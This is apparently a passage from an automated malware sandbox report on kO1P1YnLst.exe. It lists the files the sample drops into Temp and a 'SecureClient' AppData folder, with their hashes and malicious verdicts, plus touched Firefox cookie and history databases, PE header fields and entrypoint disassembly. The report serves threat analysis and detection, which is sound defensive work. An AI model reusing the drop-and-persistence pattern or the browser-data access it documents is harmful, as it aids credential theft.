Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5c4.2\bunch.dat

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Reputation:	unknown
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u5c4.2\relay.dll

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5c4.2\whale.dbf

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Reputation:	unknown
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u5c4.3.exe

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Reputation:	unknown
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Reputation:	unknown
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468131958218934
Encrypted:	false
SSDEEP:	6144:tIXfpi67eLPU9skLmb0b48WSPKaJG8nAgejZMMhA2gX4WABl0uNhdwBCswSbH:+XD948WlLZMM6YFHX+H
MD5:	1D127F179228173F76D3110B6A038545
SHA1:	66BCD2847478415415DAE20F62230325F6A97685
SHA-256:	E6374CFDF32E946E1B8A026F77B152A63D4587AD4C97B9966971B8AF4141B030
SHA-512:	CB492FB2113E08654C5AD9FDA058179EA6A4F2B95CBC64BFD297390485A536039457BAB9808DB4D4525D5EF7706FCE27F4280D265B9B0BD99145D91D62F7A66C
Malicious:	false
Reputation:	unknown
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.O.+...............................................................................................................................................................................................................................................................................................................................................;..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.154014281154682
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kO1P1YnLst.exe
File size:	460'289 bytes
MD5:	18d635dbc4392c2470eb97d1063e8484
SHA1:	b4bd20a549e40d8b946a9bf5439004e6111100f9
SHA256:	38b68616e12f54f0ed94d719751a9534394f3435ef49fe967c1bba3d62d1a67f
SHA512:	6d77160a99def174dad2310ae1e20896eb2c5777d5ea3edca067ea5c05516534492076ff9414ddb4c870f57ac2911119592959ccf005d230161c35f5ac202a43
SSDEEP:	12288:UguknPtI9oifhEvyzH3Ig4t5Ri3zg8kQAX6YK/:znFRiySH3Ilt5Ri3rkT6YU
TLSH:	41A49D4372D1BC60E4260B325F1E9ADC772DF9618E65EB2B2248DE0F05B13B1D623729
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...p.xd...........

File Icon


Icon Hash:	453145454155610d

Static PE Info

General

Entrypoint:	0x4040e7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6478C170 [Thu Jun 1 16:04:00 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	edb3c0a48d18802f263453ac21caaefd

Entrypoint Preview

Instruction
call 00007F9410BB9CDDh
jmp 00007F9410BB3965h
push 00000014h
push 00419050h
call 00007F9410BB5AC8h
call 00007F9410BB8643h
movzx esi, ax
push 00000002h
call 00007F9410BB9C70h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F9410BB3966h
xor ebx, ebx
jmp 00007F9410BB3995h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F9410BB394Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F9410BB393Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F9410BB396Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F9410BB4CFCh
test eax, eax
jne 00007F9410BB396Ah
push 0000001Ch
call 00007F9410BB3A41h
pop ecx
call 00007F9410BB986Eh
test eax, eax
jne 00007F9410BB396Ah
push 00000010h
call 00007F9410BB3A30h
pop ecx
call 00007F9410BB850Bh
and dword ptr [ebp-04h], 00000000h
call 00007F9410BB7002h
test eax, eax
jns 00007F9410BB396Ah
push 0000001Bh
call 00007F9410BB3A16h
pop ecx
call dword ptr [004130C4h]
mov dword ptr [04047030h], eax
call 00007F9410BB9CC4h
mov dword ptr [004595C0h], eax
call 00007F9410BB98C1h
test eax, eax
jns 00007F9410BB396Ah

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x194a4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c48000	0x16c8d	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c5f000	0x144c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13200	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18988	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x118a3	0x11a00	304dff5a0f4ac2df96f80a2894631a17	False	0.6099706338652482	data	6.693033275368329	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x6d94	0x6e00	ab0db6cf5e54ad996c80e914e5e99b67	False	0.3920099431818182	data	4.748929159078427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x3c2d048	0x3f600	685b97e8aaad9b614ae9bf02af29567b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c48000	0x16c8d	0x16e00	f671658fd2493c05b611c2bc122eeb61	False	0.42566384904371585	data	4.939222900407214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c5f000	0x144c	0x1600	9be4907c5d0910d16fe68da865190741	False	0.7253196022727273	data	6.35911031688205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3c486b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4130184331797235
RT_ICON	0x3c48d80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.16410788381742739
RT_ICON	0x3c4b328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.21365248226950354
RT_ICON	0x3c4b790	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3694029850746269
RT_ICON	0x3c4c638	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4535198555956679
RT_ICON	0x3c4cee0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4602534562211982
RT_ICON	0x3c4d5a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.45736994219653176
RT_ICON	0x3c4db10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2671161825726141
RT_ICON	0x3c500b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.30863039399624764
RT_ICON	0x3c51160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3554964539007092
RT_ICON	0x3c515c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5674307036247335
RT_ICON	0x3c52470	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5478339350180506
RT_ICON	0x3c52d18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.6192196531791907
RT_ICON	0x3c53280	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4619294605809129
RT_ICON	0x3c55828	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48874296435272047
RT_ICON	0x3c568d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.4979508196721312
RT_ICON	0x3c57258	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.450354609929078
RT_ICON	0x3c576c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4229744136460554
RT_ICON	0x3c58568	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.48194945848375453
RT_ICON	0x3c58e10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5858294930875576
RT_ICON	0x3c594d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4985549132947977
RT_ICON	0x3c59a40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.47116182572614107
RT_ICON	0x3c5bfe8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48592870544090055
